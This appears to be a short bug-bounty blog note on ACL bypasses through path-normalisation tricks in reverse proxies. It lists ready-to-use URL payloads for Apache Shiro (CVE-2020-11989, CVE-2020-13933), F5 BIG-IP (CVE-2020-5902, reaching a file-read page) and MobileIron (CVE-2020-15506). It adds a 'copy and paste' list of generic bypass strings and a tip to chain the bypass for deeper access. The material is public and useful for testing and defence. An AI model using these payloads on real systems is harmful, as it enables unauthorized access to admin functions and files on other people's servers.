acl-bypass-magic

the fascination of web security is the single payload can help us hit in the heart of system.

orange talk about the acl bypass at BlackHat USA 2018. click here enjoy his Presentation

What’s more, at one private bug bounty program, orange also use this vuln attack the internal service. I enjoy the report for more than ten times.

Yes, this is existed in the real word. But you need to guess the reverse proxy server services or you need to take the time to look the system document to guess(brute force) the restrict services.

Apache Shrio(CVE-2020-11989)

Apache Shiro before 1.5.3, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.
payload

/;/admin_endpoint

Apache Shrio(CVE-2020-13933)

Apache Shiro before 1.6.0, when using Apache Shiro, a specially crafted HTTP request may cause an authentication bypass.

payload

/test/%3badmin_endpoint

F5-BIG-IP(CVE-2020-5902)

payload

/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp

MobileIron Authentication Bypass (CVE-2020-15506)

payload

/mifs/.;/services/LogService

https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html

---

here we go, Let’s copy and paste the payload

/..;/
/;/
/.;/
/../

bug bounty tips:
just a acl bypass vuln seems to be harmless, so I suggest you need to dig in to get the system data or chain other vulns.

reference

• https://xlab.tencent.com/cn/2020/06/30/xlab-20-002/
• https://xz.aliyun.com/t/7964
• https://shiro.apache.org/security-reports.html